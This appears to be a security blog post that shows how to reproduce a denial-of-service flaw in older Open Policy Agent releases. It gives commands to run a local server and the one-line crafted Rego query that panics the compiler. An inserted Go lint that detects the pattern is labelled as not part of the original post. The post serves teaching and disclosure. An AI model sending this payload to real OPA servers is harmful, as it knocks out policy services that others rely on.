CVE-2022-33082 Practical Exploitation

CyberQueenMeg
3 min read · Jun 22, 2023


I have developed the first known practical exploit for CVE-2022-33082, “an issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2, allowing attackers to cause a Denial of Service (DoS) via a crafted input”.

Explanation of the components of CVE-2022-33082

Open Policy Agent, known as OPA, provides policy-based control for cloud-native environments. This lets cloud administrators use a single policy framework for every service in their cloud, so that all of the services play by the same rules and can work with one another. OPA uses a tool called an Abstract Syntax Tree parser, or AST parser. The OPA compiler relies on the AST parser to analyze and break down the structure of the high-level policy language so that the compiler can understand it. OPA's AST parser is written in Golang, a modern object-oriented programming language developed by Google.

The Denial of Service occurs when an attacker uses a local variable to override a function. When this happens, the system infinitely attempts to make the function call until it exhausts all of its resources doing so. Furthermore, if a hacker uses the input function and variable, they cause a compiler panic, which makes the entire compiler fail.

Exploitation of CVE-2022-33082

With this information, we can execute the attack against vulnerable versions of OPA. Any version v0.41.0 or lower is vulnerable. To reproduce it, we will download and run a local copy of OPA on Linux. (You can use a Docker container or a virtual machine for this if you don’t run Linux on bare metal. If you absolutely want to use Mac or Windows, you can find the binaries here.)

# Download the program from the Internet - pick the proper version for your processor:

# amd64
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

# arm64
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_arm64_static

You will then need to make the program executable:

sudo chmod +x opa

Then, you can deploy the server:

./opa run --server

Then, navigate to localhost:8181 in your favorite web browser. You will see the OPA page pop up with two fields: the query field and the JSON input field. The query field is where we will submit the Golang payload. The JSON input field is how OPA takes in information. We can put anything we want as the actual ‘input’. See below!

# This goes in the query field:
p := [input() | input := 1]

# This goes in the input field:
{ "input":"put this in the input field!" }

Now hit ‘submit’! You should see a bunch of text pop up in the terminal where you deployed the server! Scroll up and you’ll see the compiler panic!!!
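As an added example (not part of the original post, and not OPA's own code), here is a small Go lint that flags the pattern the crafted query above relies on before a policy reaches a vulnerable OPA: a comprehension whose head calls a name that its body also assigns with `:=`. It is a regex approximation rather than the Rego parser, and the sample policy string is constructed for the demo.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// One comprehension: "[ head | body ]", "{ head | body }" or "{ k: v | body }".
// Nested brackets are not handled; this is a pre-deployment heuristic only.
var comprehensionRe = regexp.MustCompile(`[\[{]([^|\[\]{}]+)\|([^\[\]{}]+)[\]}]`)

// A local assignment inside a comprehension body: "name := ..."
var assignRe = regexp.MustCompile(`\b([A-Za-z_][A-Za-z0-9_]*)\s*:=`)

// A function call in the head: "name(" (for "a.b(" only the last segment "b" is captured)
var callRe = regexp.MustCompile(`\b([A-Za-z_][A-Za-z0-9_]*)\s*\(`)

// ShadowedCalls returns, sorted, every name that is called as a function in a
// comprehension head while also being assigned as a local variable in that
// comprehension's body. A non-empty result means the policy should be rejected
// (or at least reviewed) before it is loaded into an OPA that predates the fix.
func ShadowedCalls(policy string) []string {
	found := map[string]bool{}
	for _, m := range comprehensionRe.FindAllStringSubmatch(policy, -1) {
		head, body := m[1], m[2]
		locals := map[string]bool{}
		for _, a := range assignRe.FindAllStringSubmatch(body, -1) {
			locals[a[1]] = true
		}
		for _, c := range callRe.FindAllStringSubmatch(head, -1) {
			if locals[c[1]] {
				found[c[1]] = true
			}
		}
	}
	names := make([]string, 0, len(found))
	for n := range found {
		names = append(names, n)
	}
	sort.Strings(names)
	return names
}

func main() {
	// Constructed sample: the crafted comprehension from the post plus a benign rule.
	policy := "package demo\n\np := [input() | input := 1]\n\nq := [x * 2 | x := 1]\n"
	fmt.Println(ShadowedCalls(policy)) // [input]
}
```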

Implications

Anyone with web access to an OPA server running version 0.41.0 or lower can completely crash the server. The server is not password protected by default and automates many important cloud processes, so the result is a major loss of Availability, a core security principle.

Credits and Resources

Special thanks to Johan Fylling for initially finding this vulnerability. You can find him on Github and Twitter.

My Github repository with the exploitation method can be found at https://github.com/cyberqueenmeg/cve-2022-33082-exploit

Megan Howell is a cybersecurity student at Grand Canyon University and an Offensive Security Intern at Cisco Systems. She is a bug bounty hunter, has been featured in Forbes Magazine for her work in AI Bias hunting, and is an open source contributor to programs like BeeF and BlackArch Linux, a former DefCon speaker, a SkillsUSA Cybersecurity national competitor, a National Cyber Scholar, and a Cyber Patriot competitor. You can find her social media profiles at linktr.ee/cyberqueenmeg.

DISCLAIMER

The information presented above can be used for both beneficial and malicious purposes. I do not condone or endorse the use of this information for malicious purposes and will fully support the prosecution of those who use the information presented above in a manner that violates the law. You are only authorized to utilize this information on your own systems or on systems you are explicitly authorized to penetration test or perform bug bounties on. If you use this exploit in a malicious manner, you will be charged and prosecuted to the full extent of the laws surrounding unethical hacking and cyber crime.

CyberQueenMeg

GCU ‘25. DFIR Intern @ Cisco, Cybersecurity/tech nerd, musician (violin, piano, & guitar), Christian, and bug bounty hunter.